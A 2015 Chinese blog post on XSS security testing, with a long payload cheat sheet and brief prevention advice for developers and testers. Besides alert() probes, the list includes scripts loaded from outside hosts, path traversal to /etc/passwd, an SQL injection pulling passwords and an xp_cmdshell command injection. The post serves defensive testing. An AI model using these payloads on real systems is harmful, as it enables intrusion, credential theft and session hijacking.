安全性测试--XSS

上一篇 / 下一篇  2015-01-28 15:57:32 / 个人分类:安全性测试

2.Cross-site scritping(XSS):(跨站点脚本攻击)

(1)如何进行XSS测试?

 

  • <!--[if !supportLists]-->首先,找到带有参数传递的URL,如登录页面,搜索页面,提交评论,发表留言页面等等。
  • <!--[if !supportLists]-->其次,在页面参数中输入如下语句(如:Javascrīpt,VB scrīpt, HTML,ActiveX, Flash)来进行测试

<scrīpt>alert(document.cookie)</scrīpt>


      注:其它的XSS测试语句

><scrīpt>alert(document.cookie)</scrīpt> 
='><scrīpt>alert(document.cookie)</scrīpt> 
<scrīpt>alert(document.cookie)</scrīpt> 
<scrīpt>alert(vulnerable)</scrīpt> 
%3Cscrīpt%3Ealert('XSS')%3C/scrīpt%3E 
<scrīpt>alert('XSS')</scrīpt> 
<img src="javascrīpt:alert('XSS')"> 
%0a%0a<scrīpt>alert(\"Vulnerable\")</scrīpt>.jsp 
%22%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e 
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini 
%3c/a%3e%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e 
%3c/title%3e%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e 
%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e/index.html 
%3f.jsp 
%3f.jsp 
&lt;scrīpt&gt;alert('Vulnerable');&lt;/scrīpt&gt 
<scrīpt>alert('Vulnerable')</scrīpt> 
?sql_debug=
a%5c.aspx 
a.jsp/<scrīpt>alert('Vulnerable')</scrīpt> 
a/ 
a?<scrīpt>alert('Vulnerable')</scrīpt> 
"><scrīpt>alert('Vulnerable')</scrīpt> 
';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&& 
%22%3E%3Cscrīpt%3Ealert(document.cookie)%3C/scrīpt%3E 
%3Cscrīpt%3Ealert(document. domain);%3C/scrīpt%3E& 
%3Cscrīpt%3Ealert(document.domain);%3C/scrīpt%3E&SESSION_ID={SESSION_ID}&SESSION_ID= 
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname= 
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd 
..\..\..\..\..\..\..\..\windows\system.ini 
\..\..\..\..\..\..\..\..\windows\system.ini 
'';!--"<XSS>=&{()} 
<IMG SRC="javascrīpt:alert('XSS');"> 
<IMG SRC=javascrīpt:alert('XSS')> 
<IMG SRC=javascrīpt:alert('XSS')> 
<IMG SRC=javascrīpt:alert(&quot;XSS&quot;)> 
<IMG SRC=javascrīpt:alert('XSS')> 
<IMG SRC=javascrīpt:alert('XSS')> 
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> 
<IMG SRC="jav ascrīpt:alert('XSS');"> 
<IMG SRC="jav ascrīpt:alert('XSS');"> 
<IMG SRC="jav ascrīpt:alert('XSS');"> 
"<IMG SRC=java\0scrīpt:alert(\"XSS\")>";' > out 
<IMG SRC=" javascrīpt:alert('XSS');"> 
<scrīpt>a=/XSS/alert(a.source)</scrīpt> 
<BODY BACKGROUND="javascrīpt:alert('XSS')"> 
<BODY ōNLOAD=alert('XSS')> 
<IMG DYNSRC="javascrīpt:alert('XSS')"> 
<IMG LOWSRC="javascrīpt:alert('XSS')"> 
<BGSOUND SRC="javascrīpt:alert('XSS');"> 
<br size="&{alert('XSS')}"> 
<LAYER SRC="http://xss.ha.ckers.org/a.js"></layer> 
<LINK REL="stylesheet" HREF="javascrīpt:alert('XSS');"> 
<IMG SRC='vbscrīpt:msgbox("XSS")'> 
<IMG SRC="mocha:[code]"> 
<IMG SRC="livescrīpt:[code]"> 
<META. HTTP-EQUIV="refresh" CONTENT="0;url=javascrīpt:alert('XSS');"> 
<IFRAME. SRC=javascrīpt:alert('XSS')></IFRAME> 
<FRAMESET><FRAME. SRC=javascrīpt:alert('XSS')></FRAME></FRAMESET> 
<TABLE BACKGROUND="javascrīpt:alert('XSS')"> 
<DIV STYLE="background-image: url(javascrīpt:alert('XSS'))"> 
<DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');"> 
<DIV STYLE="width: expression(alert('XSS'));"> 
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> 
<IMG STYLE='xss:expre\ssion(alert("XSS"))'> 
<STYLE. TYPE="text/javascrīpt">alert('XSS');</STYLE> 
<STYLE. TYPE="text/css">.XSS{background-image:url("javascrīpt:alert('XSS')");}</STYLE><A CLASS=XSS></A> 
<STYLE. type="text/css">BODY{background:url("javascrīpt:alert('XSS')")}</STYLE> 
<BASE HREF="javascrīpt:alert('XSS');//"> 
getURL("javascrīpt:alert('XSS')") 
a="get";b="URL";c="javascrīpt:";d="alert('XSS');";eval(a+b+c+d); 
<XML SRC="javascrīpt:alert('XSS');"> 
"> <BODY ōNLOAD="a();"><scrīpt>function a(){alert('XSS');}</scrīpt><" 
<scrīpt SRC="/Article/UploadFiles/200608/20060827171609376.jpg"></scrīpt> 
<IMG SRC="javascrīpt:alert('XSS')" 
<!--#exec cmd="/bin/echo '<scrīpt SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></scrīpt>'"--> 
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> 
<scrīpt a=">" SRC="http://xss.ha.ckers.org/a.js"></scrīpt> 
<scrīpt =">" SRC="http://xss.ha.ckers.org/a.js"></scrīpt> 
<scrīpt a=">" '' SRC="http://xss.ha.ckers.org/a.js"></scrīpt> 
<scrīpt "a='>'" SRC="http://xss.ha.ckers.org/a.js"></scrīpt> 
<scrīpt>document.write("<SCRI");</scrīpt>PT SRC="http://xss.ha.ckers.org/a.js"></scrīpt> 
<A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>

 

  • 最后,当用户浏览时便会弹出一个警告框,内容显示的是浏览者当前的cookie串,这就说明该网站存在XSS漏洞。
  • 试想如果我们注入的不是以上这个简单的测试代码,而是一段经常精心设计的恶意脚本,当用户浏览此帖时,cookie信息就可能成功的被攻击者获取。此时浏览者的帐号就很容易被攻击者掌控了。

(2)如何预防XSS漏洞?
    从应用程序的角度来讲,要进行以下几项预防:

  • Javascrīpt,VB scrīpt, HTML,ActiveX, Flash等语句或脚本进行转义.
  • 在服务端正式处理之前提交数据的合法性(合法性检查主要包括三项:数据类型,数据长度,敏感字符的校验)进行检查等。最根本的解决手段,在确认客户端的输入合法之前,服务端拒绝进行关键性的处理操作.

    从测试人员的角度来讲,要从需求检查和执行测试过程两个阶段来完成XSS检查:

  • 在需求检查过程中对各输入项或输出项进行类型、长度以及取值范围进行验证,着重验证是否对HTML或脚本代码进行了转义。
  • 执行测试过程中也应对上述项进行检查。

TAG:

引用 删除 蓬莱逸仙   /   2015-01-31 14:59:55
5
 

评分:0

我来说两句

Open Toolbar